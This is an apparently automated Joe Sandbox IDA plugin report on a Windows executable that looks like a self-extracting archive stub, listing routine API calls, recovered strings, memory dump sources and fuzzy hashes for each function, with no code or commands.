                                                                          • String ID: $%s$@%s
                                                                          • API String ID: 562999700-834177443
                                                                          • Opcode ID: 9ddcfc98ef02364985c8edd9f99d90b8c5aad8254913c7cc6485f897604cbe23
                                                                          • Instruction ID: 635c17d37727a91204b90e8d0034f889228bd92c6aca9b2275158e6fc4f538c9
                                                                          • Opcode Fuzzy Hash: 9ddcfc98ef02364985c8edd9f99d90b8c5aad8254913c7cc6485f897604cbe23
                                                                          • Instruction Fuzzy Hash: 3921A23284024CAEDF20EEE4CC01FEE7BA8AF05710F040522F910961E2E675D658FB51
                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00F0AC5A,00000008,?,00000000,?,00F0D22D,?,00000000), ref: 00F10E85
                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00F0AC5A,00000008,?,00000000,?,00F0D22D,?,00000000), ref: 00F10E8F
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00F0AC5A,00000008,?,00000000,?,00F0D22D,?,00000000), ref: 00F10E9F
                                                                          Strings
                                                                          • Thread pool initialization failed., xrefs: 00F10EB7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                          • String ID: Thread pool initialization failed.
                                                                          • API String ID: 3340455307-2182114853
                                                                          • Opcode ID: 3f5adf131419ef0ee5c80097896a3ee0dd071350823fd2a909b200bfb13ae823
                                                                          • Instruction ID: 370190099f7c02e6106b30c0412fbe15fd067ba463e17954cc1e8b1ff5b7c8df
                                                                          • Opcode Fuzzy Hash: 3f5adf131419ef0ee5c80097896a3ee0dd071350823fd2a909b200bfb13ae823
                                                                          • Instruction Fuzzy Hash: A31194B1A407089FD3215F669C849A7FBDCEB54764F14482EF1D6C3200DAB159C0AB50
                                                                          APIs
                                                                            • Part of subcall function 00F01316: GetDlgItem.USER32(00000000,00003021), ref: 00F0135A
                                                                            • Part of subcall function 00F01316: SetWindowTextW.USER32(00000000,00F335F4), ref: 00F01370
                                                                          • EndDialog.USER32(?,00000001), ref: 00F1B2BE
                                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00F1B2D6
                                                                          • SetDlgItemTextW.USER32(?,00000067,?), ref: 00F1B304
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ItemText$DialogWindow
                                                                          • String ID: GETPASSWORD1
                                                                          • API String ID: 445417207-3292211884
                                                                          • Opcode ID: 741bc9e3bc771e6b071c39eaba9b75964b506beca4d3504d8230e1b35ee543d4
                                                                          • Instruction ID: aa46b39b8f86f0d10c6a59e76d9c8241d531fa64d22cad398d750d7e877866c9
                                                                          • Opcode Fuzzy Hash: 741bc9e3bc771e6b071c39eaba9b75964b506beca4d3504d8230e1b35ee543d4
                                                                          • Instruction Fuzzy Hash: 6B11C432D00119F6DB229A649D49FFF376CEF5A720F000020FA46F24C0C7B5AA99B761
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                          • API String ID: 0-56093855
                                                                          • Opcode ID: c6e9c5e0b94edce83ab9ba8ef1f10f1fd8a8b949c61ddb97420fe1dc73fb9215
                                                                          • Instruction ID: 2f7aa5767dac8304867bdd3a8cb5cef0177a65fe7c3bfbfcd5a885f5bacdd072
                                                                          • Opcode Fuzzy Hash: c6e9c5e0b94edce83ab9ba8ef1f10f1fd8a8b949c61ddb97420fe1dc73fb9215
                                                                          • Instruction Fuzzy Hash: 31015A7AA04249AFDB119F68FC44ADA7BB9F75A3A4B100429F90593231C6319891FBA0
                                                                          APIs
                                                                          • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00F1DBF4
                                                                          • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F1DC30
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentVariable
                                                                          • String ID: sfxcmd$sfxpar
                                                                          • API String ID: 1431749950-3493335439
                                                                          • Opcode ID: 1508c8f968eb007309d4834e017f13bd63e7543bab300d0093301f85ba6167ee
                                                                          • Instruction ID: e470b8de2a9dec9668b5f2152a2992513fc1a75ff306bdc267ef6a8707b69edc
                                                                          • Opcode Fuzzy Hash: 1508c8f968eb007309d4834e017f13bd63e7543bab300d0093301f85ba6167ee
                                                                          • Instruction Fuzzy Hash: 42F0A7B2804238A6CB207B958C06FEA3769AF04B91B040815BD8595151D6F489C0F6E1
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: __alldvrm$_strrchr
                                                                          • String ID:
                                                                          • API String ID: 1036877536-0
                                                                          • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                          • Instruction ID: e3451b76a4befb30258737baeed0543bbb1183e0cd535ed358d83f73e30f6384
                                                                          • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                          • Instruction Fuzzy Hash: ECA16B72E483A69FEB15CF18E8917AEBBE5EF51320F14416DE4859B381C2B88D41E750
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00F07F69,?,?,?), ref: 00F0A3FA
                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00F07F69,?), ref: 00F0A43E
                                                                          • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00F07F69,?,?,?,?,?,?,?), ref: 00F0A4BF
                                                                          • CloseHandle.KERNEL32(?,?,?,00000800,?,00F07F69,?,?,?,?,?,?,?,?,?,?), ref: 00F0A4C6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: File$Create$CloseHandleTime
                                                                          • String ID:
                                                                          • API String ID: 2287278272-0
                                                                          • Opcode ID: 6550f7df7bbd48615a0473c2f9e827a14d32f94115fefe78bdbeba1730c3bbea
                                                                          • Instruction ID: 3fb70c70d66819a032601fb46738867ac621d907cb11ca2e22172d9148e6c95e
                                                                          • Opcode Fuzzy Hash: 6550f7df7bbd48615a0473c2f9e827a14d32f94115fefe78bdbeba1730c3bbea
                                                                          • Instruction Fuzzy Hash: 3141DF356483819AD731DF24DC45FEEBBE5AB80310F04091DB5E1D31D0D6A99A48FB53
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen
                                                                          • String ID:
                                                                          • API String ID: 176396367-0
                                                                          • Opcode ID: 87d1a87698370aeb0a848a756230bab70711657aa8be73c5cc1fa7d159dd82f6
                                                                          • Instruction ID: e19662fd49e1654e4476b1e6ca11db53a9461b29e363b655b5e24ac9216f3499
                                                                          • Opcode Fuzzy Hash: 87d1a87698370aeb0a848a756230bab70711657aa8be73c5cc1fa7d159dd82f6
                                                                          • Instruction Fuzzy Hash: 2A41C571D0066A9BCB259F688C099EF7BB8EF01310F010019FD45F7245DF74AE999BA4
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00F291E0,?,00000000,?,00000001,?,?,00000001,00F291E0,?), ref: 00F2C9D5
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F2CA5E
                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00F26CBE,?), ref: 00F2CA70
                                                                          • __freea.LIBCMT ref: 00F2CA79
                                                                            • Part of subcall function 00F28E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2CA2C,00000000,?,00F26CBE,?,00000008,?,00F291E0,?,?,?), ref: 00F28E38
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                          • String ID:
                                                                          • API String ID: 2652629310-0
                                                                          • Opcode ID: cd96bad0d649bd13b621766754a51e8ade489bcaf5ef5088e3d9d64a5719fa7b
                                                                          • Instruction ID: c287bfd1d6be1b82e79f06db5e0b748cd73d2d007b4dde7de06dbed21946db53
                                                                          • Opcode Fuzzy Hash: cd96bad0d649bd13b621766754a51e8ade489bcaf5ef5088e3d9d64a5719fa7b
                                                                          • Instruction Fuzzy Hash: E031AE72A0022AABDB24DF65EC51DBE7BA5EF41720B044268FC04E7250E739DD54EBD0
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 00F1A666
                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F1A675
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F1A683
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00F1A691
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDevice$Release
                                                                          • String ID:
                                                                          • API String ID: 1035833867-0
                                                                          • Opcode ID: adf4beea053fb26b228c55bf7950267745d60c11e84f628e75b0421f37271ff5
                                                                          • Instruction ID: 95a1173e27a980d301ed32391f1fff97f3f4f9894f95403aab56299b9484af83
                                                                          • Opcode Fuzzy Hash: adf4beea053fb26b228c55bf7950267745d60c11e84f628e75b0421f37271ff5
                                                                          • Instruction Fuzzy Hash: 11E01231E46725FBD3615B60BC0DBCF3E54AB16B96F010105FE15961E0DBB48609ABA1
                                                                          APIs
                                                                            • Part of subcall function 00F1A699: GetDC.USER32(00000000), ref: 00F1A69D
                                                                            • Part of subcall function 00F1A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F1A6A8
                                                                            • Part of subcall function 00F1A699: ReleaseDC.USER32(00000000,00000000), ref: 00F1A6B3
                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00F1A83C
                                                                            • Part of subcall function 00F1AAC9: GetDC.USER32(00000000), ref: 00F1AAD2
                                                                            • Part of subcall function 00F1AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00F1AB01
                                                                            • Part of subcall function 00F1AAC9: ReleaseDC.USER32(00000000,?), ref: 00F1AB99
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectRelease$CapsDevice
                                                                          • String ID: (
                                                                          • API String ID: 1061551593-3887548279
                                                                          • Opcode ID: f6161f0722a6e1e90f2e68518063a6f0e77b73f520665a5fd26d3ee3d5f70b4a
                                                                          • Instruction ID: 04511a72d0ef83b8f313de9964a0fdbcdc1530f8c9ff6697554462f600eff2b0
                                                                          • Opcode Fuzzy Hash: f6161f0722a6e1e90f2e68518063a6f0e77b73f520665a5fd26d3ee3d5f70b4a
                                                                          • Instruction Fuzzy Hash: 8A91FF71608344AFD710DF25C844A6BBBE9FFC9721F00491EF99AD3260DB70A946DB62
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F075E3
                                                                            • Part of subcall function 00F105DA: _wcslen.LIBCMT ref: 00F105E0
                                                                            • Part of subcall function 00F0A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00F0A598
                                                                          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F0777F
                                                                            • Part of subcall function 00F0A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F0A325,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A501
                                                                            • Part of subcall function 00F0A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F0A325,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A532
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                          • String ID: :
                                                                          • API String ID: 3226429890-336475711
                                                                          • Opcode ID: a20ea471d17192e12789320969905d80e7df356fdd5894ab6bb901159afce633
                                                                          • Instruction ID: 84981f963291fdb4e09a9244a2c259c4e7bd63866105ff2c74e7e0f12b488440
                                                                          • Opcode Fuzzy Hash: a20ea471d17192e12789320969905d80e7df356fdd5894ab6bb901159afce633
                                                                          • Instruction Fuzzy Hash: E5416F71D05258A9EB25EB64CC55EEEB77DAF41300F0040D6B60AA20D2DBB85F85FF61
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen
                                                                          • String ID: }
                                                                          • API String ID: 176396367-4239843852
                                                                          • Opcode ID: b4a509c7c243c787e776bc96130e98131a73c8cb71e10c3d46dcf5b470e2f406
                                                                          • Instruction ID: f3fcce71c23cda20cc7a0803b628f163a241ab176897d8c07a7cfd9ebcb5c2d6
                                                                          • Opcode Fuzzy Hash: b4a509c7c243c787e776bc96130e98131a73c8cb71e10c3d46dcf5b470e2f406
                                                                          • Instruction Fuzzy Hash: 7321D1729043169AD731EB64EC45AAAB3EDDF91760F08042AF580C3145EB68DD88A3A2
                                                                          APIs
                                                                            • Part of subcall function 00F0F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F0F2E4
                                                                            • Part of subcall function 00F0F2C5: GetProcAddress.KERNEL32(00F481C8,CryptUnprotectMemory), ref: 00F0F2F4
                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,00F0F33E), ref: 00F0F3D2
                                                                          Strings
                                                                          • CryptUnprotectMemory failed, xrefs: 00F0F3CA
                                                                          • CryptProtectMemory failed, xrefs: 00F0F389
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CurrentProcess
                                                                          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                          • API String ID: 2190909847-396321323
                                                                          • Opcode ID: f7f49abea4f82f02e104a1efe734084ccfba23e9aec6b9642ce1bf66d4283fd3
                                                                          • Instruction ID: c3eecfd8de3a28820d3292627d22d9b30e51dba9ea5d103a288d3f5b83376c57
                                                                          • Opcode Fuzzy Hash: f7f49abea4f82f02e104a1efe734084ccfba23e9aec6b9642ce1bf66d4283fd3
                                                                          • Instruction Fuzzy Hash: 02112631A00229ABEF25AF20EC41A6E3B55FF41770B048126FC029B6D1DA34ED4AB691
                                                                          APIs
                                                                          • _swprintf.LIBCMT ref: 00F0B9B8
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: __vswprintf_c_l_swprintf
                                                                          • String ID: %c:\
                                                                          • API String ID: 1543624204-3142399695
                                                                          • Opcode ID: abe21e974f33672eb3e3b05c291e92aa2da8ce820a9cae353d73974094ec95e6
                                                                          • Instruction ID: 2b039a5a96ae0124854e9d8d9b518c53e1934a1c65045013a56bf738cfce714a
                                                                          • Opcode Fuzzy Hash: abe21e974f33672eb3e3b05c291e92aa2da8ce820a9cae353d73974094ec95e6
                                                                          • Instruction Fuzzy Hash: A001F963600312B5DA30AB359C45D6BB7ACDE95770B40480AF944D60C2EB28D844F2B1
                                                                          APIs
                                                                          • CreateThread.KERNEL32(00000000,00010000,00F11160,?,00000000,00000000), ref: 00F11043
                                                                          • SetThreadPriority.KERNEL32(?,00000000), ref: 00F1108A
                                                                            • Part of subcall function 00F06C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F06C54
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                          • String ID: CreateThread failed
                                                                          • API String ID: 2655393344-3849766595
                                                                          • Opcode ID: cf7c5ef1ef61123bfa5310ca6055ff9f827757b1b5eedd07257de2d566a477dd
                                                                          • Instruction ID: 260377cc344e385bd687f1430eab03c72758b5ee712e7d2c2fa3fa46243e2c06
                                                                          • Opcode Fuzzy Hash: cf7c5ef1ef61123bfa5310ca6055ff9f827757b1b5eedd07257de2d566a477dd
                                                                          • Instruction Fuzzy Hash: 2C012BB574030D6BD3349E249C51FB67758FB44361F10002EFA87961C0CAA0A8C5B620
                                                                          APIs
                                                                            • Part of subcall function 00F0E2E8: _swprintf.LIBCMT ref: 00F0E30E
                                                                            • Part of subcall function 00F0E2E8: _strlen.LIBCMT ref: 00F0E32F
